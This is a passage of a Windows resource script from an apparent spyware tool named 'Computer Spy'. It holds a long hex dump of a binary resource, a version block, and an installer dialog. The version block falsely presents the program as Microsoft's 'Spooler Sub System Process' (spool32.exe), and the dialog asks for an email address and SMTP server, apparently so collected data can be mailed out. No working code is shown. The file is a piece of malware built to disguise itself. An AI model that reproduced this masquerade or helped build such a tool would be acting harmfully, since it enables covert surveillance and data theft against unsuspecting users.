    0x8281, 0x8370, 0x4bd7, 0xc58d, 0xe7b1, 0x2db0, 0x038b, 0x90ee, 0xc5c7, 
    0x0f41, 0xb514, 0x7b18, 0xd38f, 0xb723, 0xa028, 0x3efe, 0xc6a9, 0x08df, 
    0x6be9, 0xa98a, 0x971a, 0x5e73, 0x9462, 0x2843, 0x853f, 0xe581, 0x81cb, 
    0x72dc, 0x1faf, 0xe0a8, 0xefb0, 0x365a, 0x0614, 0x82cd, 0x5259, 0xb04e, 
    0x201b, 0x0d9f, 0x5620, 0xd6d4, 0xeaa4, 0xdab8, 0x89b1, 0xea22, 0xe912, 
    0x0f81, 0x4085, 0x1263, 0x7d85, 0xca83, 0x89aa, 0x9726, 0x287a, 0xc9ea, 
    0x6aa4, 0x185f, 0xac88, 0xfb75, 0x9678, 0x81da, 0x02b9, 0xf91f, 0x916d, 
    0x989d, 0x0e2e, 0x2cb1, 0x04f5, 0x66a6, 0x7027, 0xe396, 0x649c, 0x164e, 
    0x4006, 0x4067, 0x9073, 0x173a, 0x89e7, 0x97b3, 0x831a, 0x6479, 0x755f, 
    0x904b, 0x2aa5, 0x5ae5, 0xd837, 0x60ca, 0x7fa9, 0xa049, 0xaa80, 0x8aa1, 
    0x1f58, 0xb1cb, 0xb085, 0x5e0a, 0x99b0, 0x962e, 0x4f98, 0x0b2a, 0x2b31, 
    0x1e02, 0x47de, 0x3f98, 0xf417, 0xd60c, 0x45ee, 0x890a, 0x5e70, 0x15b5, 
    0x2e2e, 0x1a04, 0x2e1f, 0x76a0, 0xa0dd, 0x8ea6, 0x923a, 0xe754, 0xb0f5, 
    0x8d85, 0x50ee, 0xa075, 0xed02, 0xacdd, 0x5816, 0xe18e, 0xffd8, 0xd137, 
    0xe529, 0x97b7, 0x51d7, 0x3fd4, 0x4a2a, 0xa2c0, 0xb116, 0x6020, 0x1681, 
    0x97ea, 0x2724, 0x074b, 0xbd45, 0x549a, 0xdb2b, 0xc27f, 0xc7a3, 0x1d49, 
    0x5249, 0x28cf, 0xaf4a, 0x566c, 0xcfd7, 0x0971, 0x44e5, 0xbb31, 0x98be, 
    0x52ea, 0xb394, 0xe6ee, 0xa06f, 0x8f53, 0x7e91, 0x25e5, 0x9579, 0x60ac, 
    0x3225, 0xfa91, 0x6237, 0x0a63, 0x292b, 0x1b2a, 0xbfa9, 0x59cb, 0xe981, 
    0x1257, 0xc534, 0x70d7, 0x6907, 0x8f3d, 0xb395, 0x88b9, 0xe289, 0xe050, 
    0x84f1, 0x9c88, 0xa6bc, 0x0728, 0x196b, 0x8437, 0xebc0, 0x8a33, 0xdc2b, 
    0x0eaa, 0x5824, 0xbd48, 0x28aa, 0xac2f, 0x0770, 0xb665, 0x5600, 0xe0e7, 
    0x703c, 0x25c9, 0x30af, 0x70e6, 0x01c5, 0xf6a3, 0x12da, 0xb9c0, 0x6933, 
    0xe71e, 0xf1ab, 0x00af, 0x8fa1, 0xa4db, 0x6fc4, 0xd905, 0x294b, 0x2af2, 
    0x527d, 0xa61c, 0x9e42, 0xb001, 0x5400, 0x468e, 0x46c3, 0x2551, 0xae90, 
    0x452a, 0x056c, 0x2a05, 0xea86, 0x5443, 0xc6a5, 0xea8f, 0x6cb3, 0xe531, 
    0x87f5, 0xd039, 0xac4c, 0x3a18, 0x0e5d, 0xa185, 0x1430, 0xc286, 0xf850, 
    0x10ff, 0xb722, 0x65fd, 0xd84f, 0xb0bd, 0x2e6f, 0x2381, 0xe251, 0x8884, 
    0x1bb7, 0x5c2d, 0x8a4c, 0x5a7c, 0x94ca, 0xdf21, 0x1213, 0x08f7, 0xf52a, 
    0xfbbb, 0xc4d2, 0xd9f7, 0x42fc, 0xa34a, 0x3884, 0x6203, 0x59fc, 0x9eba, 
    0x1459, 0xda7e, 0xed4d, 0x259b, 0x92bf, 0x19b6, 0x51e2, 0x21f8, 0xc432, 
    0x0db8, 0x4117, 0x1f8c, 0x671e, 0x8c42, 0xd75f, 0x1774, 0x9a50, 0xe871, 
    0x85a8, 0x3c78, 0xc63e, 0xf886, 0x1047, 0x4097, 0x1f8c, 0x6804, 0x5e21, 
    0xe389, 0x4c41, 0x592e, 0xaf10, 0xe882, 0x3e7c, 0xc1a5, 0x658f, 0x6bf0, 
    0x247c, 0x3bba, 0x09e1, 0xfdac, 0x3e6e, 0xd730, 0x97d5, 0x975c, 0xaccf, 
    0xebfd, 0x1479, 0xe193, 0x9450, 0x4f16, 0x844f, 0xe274, 0x0c77, 0x1d1f, 
    0x8e94, 0x5a42, 0x4f19, 0x6cff, 0x7a50, 0xa0c3, 0xc6f4, 0xe941, 0x0787, 
    0xffa5, 0x5061, 0xd37a, 0x34a0, 0xc4ba, 0x0047, 0x9f20, 0x2f07, 0x22bb, 
    0x2689, 0xf828, 0xf702, 0x07a2, 0x1e5b, 0x149c, 0xff2f, 0x69d5, 0xde39, 
    0xa4fe, 0xaf1c, 0xbc7b, 0x971b, 0xca82, 0xb35f, 0xc496, 0x034f, 0xd77e, 
    0xe3ce, 0xb53b, 0x9837, 0xbae7, 0x3901, 0x8fce, 0xffc7, 0x3df2, 0x0bf1, 
    0xf1e2, 0x016f, 0xadff, 0x671d, 0x8c76, 0x3ea7, 0xd1de, 0x63b3, 0x8dc1, 
    0x5ffb, 0x9db3, 0xaaa4, 0xb180, 0xc755, 0x1e17, 0x52d7, 0x1df7, 0x3a6f, 
    0xfbae, 0xfe26, 0x63d1, 0xbaa7, 0xc32f, 0x7819, 0xa24d, 0x1ca5, 0xaf7a, 
    0xadfb, 0x6d47, 0xa6f2, 0x4371, 0x6696, 0x0c28, 0xa185, 0x1430, 0xc286, 
    0x1850, 0x430a, 0x2861, 0x850c, 0xf0a1, 0x0957, 0x5370, 0x447d, 0x7701, 
    0x4636, 0x8ccd, 0xc661, 0xb733, 0x5332, 0x0098, 0x33c3, 0x33f7, 0x985b, 
    0x9867, 0x30df, 0x99bb, 0x9957, 0xcc83, 0x4c5b, 0xb98c, 0x28cc, 0x95b2, 
    0xead9, 0xb1ec, 0xaed9, 0x776c, 0x2076, 0x39bb, 0x923b, 0x39bd, 0xf1fb, 
    0x97ec, 0xffb2, 0x7b3d, 0xf65f, 0xecb1, 0xb30f, 0xd26f, 0xd38d, 0xaadd, 
    0xa29b, 0x5dbb, 0xd3a7, 0xe8e5, 0x74f2, 0xba55, 0xbaf9, 0xae80, 0xd759, 
    0x8bae, 0x36ea, 0xb6eb, 0x9eea, 0x3dd0, 0xdbaf, 0x7baf, 0xf743, 0xdd7b, 
    0xba17, 0xd2ff, 0xeb25, 0xf4d3, 0xf573, 0xf48b, 0xf47b, 0xebef, 0xd13f, 
    0x1927, 0x0d52, 0x0c63, 0x0de3, 0x8659, 0x0669, 0x61b7, 0x81b9, 0xb433, 
    0xd619, 0x1e1b, 0xfc36, 0xf0d2, 0x6192, 0xa18f, 0xf0cb, 0x869f, 0x8623, 
    0x0c2f, 0x367f, 0x69dc, 0x1b34, 0x8cab, 0xc675, 0xe346, 0x633a, 0xb8d4, 
    0xb8c9, 0xf8cd, 0x719c, 0x71bf, 0x29aa, 0x54df, 0x0a6c, 0x9a9a, 0x9b4d, 
    0xbf4d, 0x9d36, 0x7d32, 0xea6c, 0xcd33, 0x9b30, 0x75cc, 0x9f66, 0xa379, 
    0x65f9, 0x41f3, 0x65f3, 0x64b3, 0x5956, 0x5a66, 0x59e6, 0x96dc, 0x65a0, 
    0xe587, 0xcb45, 0x2d9f, 0x6b0a, 0xf59a, 0xeb56, 0x6b4c, 0x358e, 0xeacf, 
    0x6eb4, 0x3eb3, 0xfd65, 0x6ac2, 0x19c8, 0x636b, 0xac6c, 0xb96d, 0xa7ed, 
    0x4db6, 0x9db6, 0x0fb6, 0x3a6d, 0xd3bb, 0xb11e, 0x653f, 0xde7f, 0xaafe, 
    0x3ffd, 0xbfec, 0x9fb7, 0x7fb4, 0x8f64, 0x47d9, 0x6e3b, 0x4c71, 0x3075, 
    0x8b0e, 0xd723, 0xec51, 0x71a8, 0x752c, 0x1d44, 0x70bf, 0xed3c, 0xe5d8, 
    0xefd8, 0xa3f8, 0xdfa3, 0x9b91, 0x2f3b, 0x9837, 0x3abb, 0x7377, 0x73ee, 
    0x7bb9, 0x0f73, 0xbee5, 0x7b9b, 0xf73c, 0xdcc3, 0x72cf, 0x94ff, 0x903b, 
    0x2c3b, 0x9d4f, 0x3637, 0xd6ef, 0xbfbc, 0x73cb, 0x39e4, 0x2af3, 0x6af2, 
    0xeaf2, 0x82f3, 0x2b79, 0x9ef3, 0xebcc, 0x7bcc, 0xef3b, 0x3cbd, 0x6afc, 
    0x2a61, 0x49ac, 0x3332, 0xd193, 0x7933, 0x93cc, 0xb3cc, 0x2ecc, 0x22e6, 
    0x64c3, 0xb29b, 0xea0f, 0xe8ce, 0xd4be, 0xe80d, 0xe946, 0xebc7, 0xd36f, 
    0xd7cf, 0xe937, 0xf45b, 0xd0bf, 0xd36f, 0xe977, 0xd0df, 0xa7bf, 0xa13f, 
    0x48ff, 0xa7df, 0x0357, 0x2727, 0xa61a, 0x1818, 0x42c3, 0x1343, 0xf270, 
    0x8301, 0xd860, 0x7864, 0x70cc, 0xf0d2, 0x2189, 0x3866, 0x5c0f, 0x691c, 
    0x30cc, 0x8c46, 0xf182, 0xe329, 0xe36e, 0xc61b, 0xe36e, 0x5180, 0x1a65, 
    0x9a67, 0x2a66, 0xd533, 0x1a9a, 0x8b81, 0xa6ed, 0x4d47, 0x4cc7, 0x4de7, 
    0x4c97, 0x8992, 0x2b36, 0x2acd, 0xd1b3, 0xc0bc, 0x9bcc, 0x9b57, 0x9ad7, 
    0xccdb, 0xe61d, 0x8087, 0x8fab, 0x3798, 0x3f9b, 0xf734, 0xcf98, 0xcf99, 
    0x2f9b, 0xef98, 0xb0b1, 0xb596, 0x9f96, 0x1e5a, 0x6cb2, 0x3cb4, 0xf962, 
    0xe58d, 0x2584, 0x9add, 0xcd61, 0x4eb4, 0x6ab0, 0x59ad, 0xa9d6, 0x19d6, 
    0xc656, 0xcaba, 0xd6ba, 0x66da, 0xb0ed, 0x643e, 0x653d, 0x633d, 0x598d, 
    0x582f, 0xb6bf, 0xcb0e, 0xc949, 0xc8c9, 0x9099, 0xccb3, 0x62de, 0xc07f, 
    0x98fe, 0xab7d, 0x39fd, 0x2efb, 0x5efb, 0x9bfb, 0x6ef6, 0x57fb, 0x01f6, 
    0xed3b, 0x7148, 0x1da8, 0x1c13, 0x4756, 0xa39e, 0x51cc, 0xb8e9, 0xb1c7, 
    0x11c8, 0x3474, 0x5e3b, 0x2c76, 0xc5ca, 0x71ff, 0x0170, 0xb844, 0x9982, 
    0x2ccf, 0xc262, 0x0b4c, 0x81b3, 0x1479, 0xf6e4, 0xcc57, 0x41af, 0xff72, 
    0x3995, 0xbcc0, 0x7ccd, 0x7cc6, 0x720d, 0x019b, 0x3ad2, 0x3759, 0xbfe3, 
    0x4c07, 0x7697, 0xce46, 0xbe46, 0x2146, 0x3146, 0x4946, 0x9946, 0x7946, 
    0xf546, 0xb346, 0x388d, 0x6981, 0xcf4e, 0xd7c4, 0xca24, 0xdd24, 0xd0a4, 
    0xdaa4, 0x19a4, 0xee98, 0x9bd6, 0x319c, 0x6279, 0x62c2, 0x631a, 0x645a, 
    0xd4ba, 0xd794, 0xc8cc, 0xc2ac, 0xd6ac, 0x266c, 0x7530, 0x366d, 0x6a3b, 
    0xd676, 0xaeec, 0x3bd9, 0x4633, 0x4973, 0x4b73, 0x7ef3, 0x85f3, 0x3fe6, 
    0x05cc, 0xc42c, 0xe42d, 0x542d, 0x342c, 0x742c, 0x422c, 0xaa2d, 0xa62d, 
    0xcc5a, 0x58b1, 0xb160, 0x62c4, 0xc585, 0x8b1a, 0x160d, 0x2c5b, 0x5876, 
    0x5930, 0x5872, 0x58f2, 0x000a, 0xa543, 0xb2ca, 0x9c15, 0xd6da, 0x6e58, 
    0xdcb0, 0x7962, 0x1811, 0xba0a, 0x2656, 0x1656, 0x3656, 0x0e56, 0x2e56, 
    0x1e56, 0x3e56, 0x0156, 0xb356, 0x16ac, 0x2d58, 0x5ab1, 0xb561, 0x8ac6, 
    0xdac5, 0x7ad5, 0xf59d, 0xeb09, 0xd68b, 0xa04c, 0x2a59, 0x0607, 0x1106, 
    0x58d0, 0x8999, 0x8984, 0x3002, 0xe8b7, 0x6300, 0x7419, 0x832f, 0x5005, 
    0xc78c, 0xc7c0, 0xc5a0, 0xc7a0, 0x0a60, 0x0c30, 0x0096, 0x60c3, 0xc18b, 
    0x831e, 0x0623, 0x0c67, 0x18ae, 0x31dc, 0x6278, 0xc6f0, 0x8be0, 0x1fc1, 
    0x1603, 0x1e43, 0x6860, 0x1898, 0x18ba, 0x1886, 0x168e, 0xa37e, 0x1460, 
    0x828c, 0x3051, 0x460a, 0x28c1, 0x0518, 0x60a3, 0x8c14, 0x002c, "\000" 
END


#ifndef _MAC
/////////////////////////////////////////////////////////////////////////////
//
// Version
//

VS_VERSION_INFO VERSIONINFO
 FILEVERSION 5,0,30,0
 PRODUCTVERSION 5,0,30,0
 FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
 FILEFLAGS 0x1L
#else
 FILEFLAGS 0x0L
#endif
 FILEOS 0x40004L
 FILETYPE 0x1L
 FILESUBTYPE 0x0L
BEGIN
    BLOCK "StringFileInfo"
    BEGIN
        BLOCK "040904b0"
        BEGIN
            VALUE "Comments", "Spooler Sub System Process\0"
            VALUE "CompanyName", "Microsoft Corporation\0"
            VALUE "FileDescription", "Spooler Sub System Process\0"
            VALUE "FileVersion", "4.90.3000\0"
            VALUE "InternalName", "spool32\0"
            VALUE "LegalCopyright", "Copyright © 2002\0"
            VALUE "LegalTrademarks", "\0"
            VALUE "OriginalFilename", "spool32.exe\0"
            VALUE "PrivateBuild", "\0"
            VALUE "ProductName", "Microsoft(R) Windows(R) \0"
            VALUE "ProductVersion", "4.90.3000\0"
            VALUE "SpecialBuild", "\0"
        END
    END
    BLOCK "VarFileInfo"
    BEGIN
        VALUE "Translation", 0x409, 1200
    END
END

#endif    // !_MAC


/////////////////////////////////////////////////////////////////////////////
//
// Dialog
//

IDD_DIALOG1 DIALOG DISCARDABLE  100, 100, 275, 71
STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Computer Spy                    --www.hirosh.tk--"
FONT 8, "MS Sans Serif"
BEGIN
    DEFPUSHBUTTON   "Install",IDOK,213,13,50,14
    PUSHBUTTON      "Quit",IDCANCEL,213,30,50,14
    LTEXT           "Ur Email ID",IDC_ST1,19,24,37,9
    EDITTEXT        IDC_EID,72,23,82,12,ES_AUTOHSCROLL
    LTEXT           "SMTP server",IDC_ST2,19,43,42,9
    EDITTEXT        IDC_ES,72,44,82,12,ES_AUTOHSCROLL
    GROUPBOX        "Details",IDC_ST3,7,13,188,50
    PUSHBUTTON      "UnInstall",IDC_BUN,214,47,50,14,WS_DISABLED
    LTEXT           "Already Installed On this system if u want uninstall click the uninstall button",
                    IDC_ST4,38,28,131,17
END


/////////////////////////////////////////////////////////////////////////////
//
// DESIGNINFO
//

#ifdef APSTUDIO_INVOKED
GUIDELINES DESIGNINFO DISCARDABLE 
BEGIN
    IDD_DIALOG1, DIALOG
    BEGIN
        LEFTMARGIN, 7
        RIGHTMARGIN, 268
        TOPMARGIN, 7
        BOTTOMMARGIN, 64
    END
END
#endif    // APSTUDIO_INVOKED

#endif    // English (U.S.) resources
/////////////////////////////////////////////////////////////////////////////



#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//


/////////////////////////////////////////////////////////////////////////////
#endif    // not APSTUDIO_INVOKED

